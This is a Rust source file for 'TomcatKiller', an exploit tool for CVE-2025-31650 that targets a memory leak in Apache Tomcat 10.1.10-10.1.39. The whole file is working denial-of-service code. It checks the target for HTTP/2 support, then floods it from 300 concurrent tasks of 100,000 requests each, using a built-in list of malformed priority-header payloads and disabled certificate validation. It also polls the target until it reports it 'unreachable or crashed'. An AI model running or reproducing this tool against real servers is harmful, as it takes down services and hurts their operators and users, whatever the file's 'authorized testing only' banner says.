use anyhow::{anyhow, bail, Result};
use colored::*;
use rand::Rng;
use reqwest::{ClientBuilder};
use std::io::{self, Write};
use std::net::{TcpStream, ToSocketAddrs};
use std::time::Duration;
use tokio::time::sleep;
use rand::prelude::IndexedRandom;

/// TomcatKiller - CVE-2025-31650 module entry point.
///
/// Targets the memory leak reported for Apache Tomcat (10.1.10-10.1.39) that is
/// triggered by invalid HTTP/2 `priority` headers. For authorized testing only.
///
/// Flow:
/// 1. Print a banner and prompt for the target port. 443 is used if the prompt
///    fails or the input is not a valid `u16`.
/// 2. Normalize `target` to a URL (prepending `https://` when no scheme is given)
///    and extract its host. The port parsed from the URL is discarded; the
///    prompted port is what gets used.
/// 3. Probe for HTTP/2 support. If detected, spawn a reachability monitor plus
///    `num_tasks` sender tasks, wait for every sender to finish, then abort the
///    monitor.
///
/// # Errors
///
/// Returns an error if `target` cannot be parsed as a URL with a host, if the
/// HTTP/2 probe reports that HTTP/2 is not supported, or if the probe itself
/// returns `Err`.
pub async fn run(target: &str) -> Result<()> {
    println!("{}", "===== TomcatKiller - CVE-2025-31650 =====".blue());
    println!("Developed by: @absholi7ly");
    println!("Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.");
    println!("{}", "Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.".yellow());

    // `prompt_for_port` yields None on I/O failure or unparsable input; both fall back to 443.
    let port = prompt_for_port().unwrap_or(443);
    // Only used for URL validation / host extraction below; the scheme itself is not carried forward.
    let normalized = if target.starts_with("http://") || target.starts_with("https://") {
        target.to_string()
    } else {
        format!("https://{}", target)
    };

    // The port returned by `validate_url` is intentionally ignored in favor of the prompted `port`.
    let (host, _) = match validate_url(&normalized) {
        Ok(hp) => hp,
        Err(e) => {
            eprintln!("{}", format!("Invalid target URL: {e}").red());
            return Err(e);
        }
    };

    let clean_host = strip_ipv6_brackets(&host);
    // Load shape: `num_tasks` concurrent tasks, each sending `requests_per_task` requests.
    let num_tasks = 300;
    let requests_per_task = 100000;

    match check_http2_support(&clean_host, port).await {
        Ok(true) => {
            println!("{}", format!("Starting attack on {}:{}...", clean_host, port).green());
            println!("Tasks: {}, Requests per task: {}", num_tasks, requests_per_task);
            println!("{}", "Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.".yellow());

            let monitor_handle = tokio::spawn(monitor_server(clean_host.clone(), port));
            let mut handles = Vec::new();

            for i in 0..num_tasks {
                let h = clean_host.clone();
                handles.push(tokio::spawn(send_invalid_priority_requests(h, port, requests_per_task, i)));
            }

            // Join results (including task panics) are deliberately ignored.
            for handle in handles {
                let _ = handle.await;
            }

            // All senders are done; stop the monitor if it is still looping.
            monitor_handle.abort();
        }
        Ok(false) => {
            bail!("Target does not support HTTP/2. Exploit not applicable.");
        }
        Err(e) => {
            eprintln!("{}", format!("[!] Error checking HTTP/2 support: {e}").red());
            return Err(e);
        }
    }

    Ok(())
}

/// Interactively asks the user for a target port on stdin.
///
/// Returns `Some(443)` for an empty answer and `Some(port)` for a valid `u16`.
/// Returns `None` if flushing stdout or reading stdin fails, or if the answer
/// is not a valid `u16`.
fn prompt_for_port() -> Option<u16> {
    print!("{}", "Enter target port (default 443): ".cyan());
    // Flush so the prompt is visible before we block on stdin.
    let mut stdout = io::stdout();
    stdout.flush().ok()?;

    let mut line = String::new();
    let stdin = io::stdin();
    stdin.read_line(&mut line).ok()?;

    match line.trim() {
        "" => Some(443),
        answer => answer.parse().ok(),
    }
}

/// Removes every leading and trailing `[` / `]` character from `host`.
///
/// Turns a bracketed IPv6 literal such as `[::1]` into `::1`. Any run of
/// brackets at either end is removed, and brackets in the middle are kept.
fn strip_ipv6_brackets(host: &str) -> String {
    const BRACKETS: [char; 2] = ['[', ']'];
    host.trim_matches(&BRACKETS[..]).to_owned()
}

/// Parses `url` and returns its host together with a port.
///
/// The port is the explicit one if present, otherwise the scheme's known
/// default, otherwise 443.
///
/// # Errors
///
/// Fails if `url` does not parse, or if the parsed URL has no host
/// ("Invalid URL format").
fn validate_url(url: &str) -> Result<(String, u16)> {
    let parsed = url::Url::parse(url)?;
    let host = match parsed.host_str() {
        Some(h) => h.to_string(),
        None => return Err(anyhow!("Invalid URL format")),
    };
    let port = parsed.port_or_known_default().unwrap_or(443);
    Ok((host, port))
}

/// Probes whether `host:port` answers over HTTP/2.
///
/// Sends a single GET to `https://{host}:{port}/`; the scheme is always
/// `https`. The client is built with HTTP/2 prior knowledge, certificate
/// validation disabled, and a 5-second timeout.
///
/// Returns `Ok(true)` if the response version is HTTP/2. Returns `Ok(false)`
/// if the server answered with another version, or if the request failed; in
/// that case the failure reason is printed.
///
/// # Errors
///
/// Only returns `Err` if the `reqwest` client cannot be built. Request
/// failures are reported as `Ok(false)`, not as errors.
async fn check_http2_support(host: &str, port: u16) -> Result<bool> {
    let client = ClientBuilder::new()
        .http2_prior_knowledge()
        .danger_accept_invalid_certs(true)
        .timeout(Duration::from_secs(5))
        .build()?;

    let url = format!("https://{}:{}/", host, port);
    let resp = client.get(&url).header("user-agent", "TomcatKiller").send().await;

    match resp {
        Ok(response) => {
            if response.version() == reqwest::Version::HTTP_2 {
                println!("{}", "HTTP/2 supported! Proceeding ...".green());
                Ok(true)
            } else {
                println!("{}", "Server responded, but HTTP/2 not used.".yellow());
                Ok(false)
            }
        }
        Err(e) => {
            // Connection/request failures are treated as "no HTTP/2", not as an error.
            println!("{}", format!("Connection failed: {}:{}. Reason: {e}", host, port).red());
            Ok(false)
        }
    }
}

/// Sender task: issues `count` GET requests to `https://{host}:{port}/`.
///
/// Each request carries:
/// - a `priority` header picked at random from `get_invalid_priorities()`;
/// - a `user-agent` tagged with `task_id` and a random number;
/// - `cache-control: no-cache`;
/// - an `accept` header with a random `q` value.
///
/// Responses and errors are discarded. If the HTTP client cannot be built, the
/// task returns immediately without reporting anything.
async fn send_invalid_priority_requests(host: String, port: u16, count: usize, task_id: usize) {
    let priorities = get_invalid_priorities();
    let client = match ClientBuilder::new()
        .http2_prior_knowledge()
        .danger_accept_invalid_certs(true)
        .timeout(Duration::from_millis(300))
        .build()
    {
        Ok(c) => c,
        // Silent exit: a build failure is not surfaced to the caller.
        Err(_) => return,
    };

    let url = format!("https://{}:{}/", host, port);

    for _ in 0..count {
        // `choose` only returns None for an empty slice; the priority list is a non-empty literal.
        let prio = priorities.choose(&mut rand::rng()).unwrap().to_string();
        let headers = [
            ("priority", prio),
            ("user-agent", format!("TomcatKiller-{}-{}", task_id, rand::rng().random::<u32>())),
            ("cache-control", "no-cache".to_string()),
            ("accept", format!("*/*; q={}", rand::rng().random_range(0.1..1.0))),
        ];

        let mut req = client.get(&url);
        for (k, v) in headers.iter() {
            req = req.header(*k, v);
        }

        // Outcome intentionally ignored (including timeouts).
        let _ = req.send().await;
    }
}

/// Periodically checks whether `host:port` still accepts TCP connections.
///
/// On each iteration it:
/// 1. resolves `"{host}:{port}"`;
/// 2. attempts a TCP connect to the first resolved address with a 2-second
///    timeout, and prints the result;
/// 3. sleeps 2 seconds.
///
/// The loop ends, after printing a message, on the first failed connect, empty
/// resolution, or resolution error. Otherwise it runs until the task is aborted.
///
/// NOTE(review): `to_socket_addrs` and `TcpStream::connect_timeout` are blocking
/// `std` calls made inside an async fn. Each probe can therefore occupy a
/// runtime worker thread for up to the connect timeout, plus resolution time.
/// Consider `tokio::net` or `tokio::task::spawn_blocking` if that matters.
async fn monitor_server(host: String, port: u16) {
    loop {
        let addr_result = format!("{}:{}", host, port).to_socket_addrs();

        match addr_result {
            Ok(mut addrs) => {
                // Only the first resolved address is probed.
                if let Some(addr) = addrs.next() {
                    if TcpStream::connect_timeout(&addr, Duration::from_secs(2)).is_ok() {
                        println!("{}", format!("Target {}:{} is reachable.", host, port).yellow());
                    } else {
                        println!("{}", format!("Target {}:{} unreachable or crashed!", host, port).red());
                        break;
                    }
                } else {
                    println!("{}", "DNS lookup failed.".red());
                    break;
                }
            }
            Err(_) => {
                println!("{}", "Failed to resolve host for monitoring.".red());
                break;
            }
        }

        sleep(Duration::from_secs(2)).await;
    }
}

/// Returns the pool of malformed `priority` header values that
/// `send_invalid_priority_requests` samples from.
///
/// Entries include:
/// - out-of-range and negative numbers;
/// - non-numeric values;
/// - duplicated or unknown parameters;
/// - an empty string;
/// - non-ASCII text.
///
/// The list must stay non-empty, because the sender `unwrap`s a random choice
/// from it.
fn get_invalid_priorities() -> Vec<&'static str> {
    vec![
        "u=-1, q=2", "u=4294967295, q=-1", "u=-2147483648, q=1.5", "u=0, q=invalid",
        "u=1/0, q=NaN", "u=1, q=2, invalid=param", "", "u=1, q=1, u=2",
        "u=99999999999999999999, q=0", "u=-99999999999999999999, q=0", "u=, q=",
        "u=1, q=1, malformed", "u=1, q=, invalid", "u=-1, q=4294967295",
        "u=invalid, q=1", "u=1, q=1, extra=😈", "u=1, q=1; malformed", "u=1, q=1, =invalid",
        "u=0, q=0, stream=invalid", "u=1, q=1, priority=recursive", "u=1, q=1, %invalid%",
        "u=0, q=0, null=0",
    ]
}
